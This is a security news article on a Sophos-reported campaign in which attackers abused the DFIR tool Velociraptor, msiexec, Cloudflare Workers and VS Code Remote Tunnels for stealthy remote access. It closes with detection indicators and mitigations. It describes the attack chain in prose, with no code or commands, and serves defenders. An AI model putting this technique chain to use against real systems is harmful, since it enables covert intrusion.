Sophos Counter Threat Unit has observed a campaign where attackers weaponized the open‑source digital forensics and incident response (DFIR) tool Velociraptor as part of a living‑off‑the‑land (LotL) intrusion. The operation chained multiple legitimate components—Windows msiexec, Cloudflare Workers, and Visual Studio Code remote tunneling—to establish stealthy remote access and enable remote code execution without deploying noisy malware.
Attack chain: msiexec staging, Cloudflare infrastructure, and VS Code Tunnels
According to Sophos, the intrusion began with msiexec retrieving an MSI from a Cloudflare Workers domain, used as an intermediary staging layer. The installer deployed Velociraptor, which then beaconed to a second domain within the same Cloudflare ecosystem. Using signed binaries and reputable cloud services helped the operators blend into normal traffic patterns.
After initial control was established, the adversaries used an encoded PowerShell command to download Visual Studio Code from the same staging node and launched it with Remote Tunnels enabled. This configuration provided inbound remote access without traditional port exposure, effectively bypassing many perimeter controls. Sophos also found signs of Cloudflare tunneling and the use of the legitimate remote administration utility Radmin. In several cases, msiexec was reused to fetch additional payloads.
From RMM to DFIR: LotL tactics continue to evolve
The abuse of Velociraptor highlights a shift in LotL tradecraft. Whereas attackers commonly misuse remote monitoring and management (RMM) tools, they are increasingly co‑opting DFIR utilities that defenders often trust by default. This complicates detection and response, as DFIR tooling can appear benign in telemetry and allowlists.
The technique maps to MITRE ATT&CK, notably Signed Binary Proxy Execution: Msiexec (T1218.007), and aligns with the use of application layers and tunnels to circumvent network egress restrictions (related to ATT&CK categories for tunneling and proxies). Sophos cautions that unsanctioned Velociraptor deployments should be treated as a potential precursor to ransomware and other post‑exploitation activities.
Risks and observable indicators in enterprise environments
Key risks include silent perimeter bypass, persistent remote access, and privilege escalation without deploying conventional backdoors. Defenders should watch for blended behaviors across signed binaries, cloud infrastructure, and encoded scripting.
Indicators and investigative leads
Security teams should investigate:
- Unusual msiexec network connections to Cloudflare Workers or unfamiliar domains.
- Unexpected installation, service activity, or configuration changes associated with Velociraptor.
- VS Code launched with parameters enabling Remote Tunnels or similar inbound proxying.
- PowerShell executions using EncodedCommand in proximity to msiexec, Velociraptor, or VS Code processes.
- Outbound connections to tunneling services and remote admin tools (e.g., Cloudflare Tunnel, Radmin) outside approved baselines.
Industry guidance and recommended defenses
Regulators and ISACs, including CISA, have repeatedly warned about the rise in abuse of legitimate RMM/administrative tools and have published hardening advice for their safe use. In parallel with Sophos’s publication, Rapid7—the maintainer of Velociraptor—issued detection and containment guidance for organizations, noting that any security tool can be misused when controls are weak.
Practical mitigations include:
- Access control and allowlisting: Restrict who can install and run DFIR/RMM tools; enforce application allowlisting for installers and signed binaries.
- Package integrity and provenance: Validate MSI sources and signatures; block installer execution from untrusted cloud endpoints.
- Process and script auditing: Monitor msiexec and PowerShell with full logging; review process trees and command‑line arguments; enable PowerShell Script Block Logging.
- Egress governance: Limit and monitor outbound traffic to tunneling and proxy services; apply DNS and TLS inspection where policy allows.
- Velociraptor detections: Alert on unknown servers of control, atypical configurations, or deviations from standard deployment profiles.
The incident underscores a broader lesson: legitimate tools do not equal trusted activity. Revisit policies for DFIR and RMM usage, tighten egress controls, and ensure enhanced logging for installers and PowerShell. Early detection of LotL patterns can materially reduce the likelihood of lateral movement and ransomware deployment.
